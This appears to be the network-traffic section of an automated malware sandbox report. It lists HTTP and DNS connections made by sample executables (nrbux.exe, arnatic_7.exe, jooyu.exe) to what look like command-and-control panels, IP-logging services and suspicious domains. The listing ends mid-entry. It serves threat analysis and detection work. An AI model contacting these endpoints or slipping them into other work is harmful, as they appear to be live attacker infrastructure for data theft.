                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        920 B
                                                                                                                                                                                        492 B
                                                                                                                                                                                        12
                                                                                                                                                                                        12

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        16
                                                                                                                                                                                        15

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.5kB
                                                                                                                                                                                        14.1kB
                                                                                                                                                                                        17
                                                                                                                                                                                        16

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        704 B
                                                                                                                                                                                        405 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 208.95.112.1:80
                                                                                                                                                                                        http://ip-api.com/json/?fields=8198
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        936 B
                                                                                                                                                                                        766 B
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://ip-api.com/json/?fields=8198

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        690 B
                                                                                                                                                                                        292 B
                                                                                                                                                                                        7
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        514 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        6
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        796 B
                                                                                                                                                                                        485 B
                                                                                                                                                                                        8
                                                                                                                                                                                        8

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        782 B
                                                                                                                                                                                        372 B
                                                                                                                                                                                        9
                                                                                                                                                                                        9

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        920 B
                                                                                                                                                                                        492 B
                                                                                                                                                                                        12
                                                                                                                                                                                        12

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 31.13.64.35:443
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        5.6kB
                                                                                                                                                                                        226.9kB
                                                                                                                                                                                        102
                                                                                                                                                                                        179

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.218.92.148:80
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=297807&key=6f62acb440fd1c860856850e882a0027
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        921 B
                                                                                                                                                                                        10
                                                                                                                                                                                        10

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://uyg5wye.2ihsfa.com/api/?sid=297807&key=6f62acb440fd1c860856850e882a0027

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        376 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        3
                                                                                                                                                                                        3

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        92.8kB
                                                                                                                                                                                        1.1kB
                                                                                                                                                                                        72
                                                                                                                                                                                        24

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                      • 31.13.83.36:443
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        5.5kB
                                                                                                                                                                                        226.7kB
                                                                                                                                                                                        98
                                                                                                                                                                                        176

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 88.218.92.148:80
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=298539&key=366454b36c6152980d512ef63d850b04
                                                                                                                                                                                        http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        961 B
                                                                                                                                                                                        11
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://uyg5wye.2ihsfa.com/api/?sid=298539&key=366454b36c6152980d512ef63d850b04

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.99.66.31:443
                                                                                                                                                                                        https://iplogger.org/18hh57
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        6.5kB
                                                                                                                                                                                        13
                                                                                                                                                                                        16

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplogger.org/18hh57

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 84.40.106.91:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        645 B
                                                                                                                                                                                        464 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        874 B
                                                                                                                                                                                        452 B
                                                                                                                                                                                        11
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        750 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        7
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        690 B
                                                                                                                                                                                        292 B
                                                                                                                                                                                        7
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        644 B
                                                                                                                                                                                        252 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        920 B
                                                                                                                                                                                        492 B
                                                                                                                                                                                        12
                                                                                                                                                                                        12

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        727 B
                                                                                                                                                                                        405 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        736 B
                                                                                                                                                                                        292 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        560 B
                                                                                                                                                                                        405 B
                                                                                                                                                                                        7
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 127.0.0.1:58833
                                                                                                                                                                                        setup_install.exe
                                                                                                                                                                                      • 127.0.0.1:58835
                                                                                                                                                                                        setup_install.exe
                                                                                                                                                                                      • 10.10.0.24:80
                                                                                                                                                                                        rundll32.exe
                                                                                                                                                                                      • 10.10.0.24:80
                                                                                                                                                                                        rundll32.exe
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        motiwa.xyz
                                                                                                                                                                                        dns
                                                                                                                                                                                        setup_install.exe
                                                                                                                                                                                        56 B
                                                                                                                                                                                        88 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        motiwa.xyz

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.21.12.59
                                                                                                                                                                                        172.67.193.180

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        ip-api.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        56 B
                                                                                                                                                                                        72 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ip-api.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        208.95.112.1

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        videoconvert-download38.xyz
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        73 B
                                                                                                                                                                                        105 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        videoconvert-download38.xyz

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        172.67.201.250
                                                                                                                                                                                        104.21.42.63

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        dns
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        58 B
                                                                                                                                                                                        74 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        email.yg9.me

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        198.13.62.186

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        dns
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        58 B
                                                                                                                                                                                        129 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        email.yg9.me

                                                                                                                                                                                      • 198.13.62.186:53
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        62.5kB
                                                                                                                                                                                        664.9kB
                                                                                                                                                                                        1192
                                                                                                                                                                                        1192
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        62 B
                                                                                                                                                                                        107 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.facebook.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        157.240.240.35

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        iphonemoney.xyz
                                                                                                                                                                                        dns
                                                                                                                                                                                        7398983.exe
                                                                                                                                                                                        61 B
                                                                                                                                                                                        93 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        iphonemoney.xyz

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        172.67.182.129
                                                                                                                                                                                        104.21.51.159

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        sergeevih43.tumblr.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        68 B
                                                                                                                                                                                        100 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        sergeevih43.tumblr.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        74.114.154.22
                                                                                                                                                                                        74.114.154.18

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        uyg5wye.2ihsfa.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        64 B
                                                                                                                                                                                        80 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        uyg5wye.2ihsfa.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        88.218.92.148

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        iw.gamegame.info
                                                                                                                                                                                        dns
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        62 B
                                                                                                                                                                                        94 B
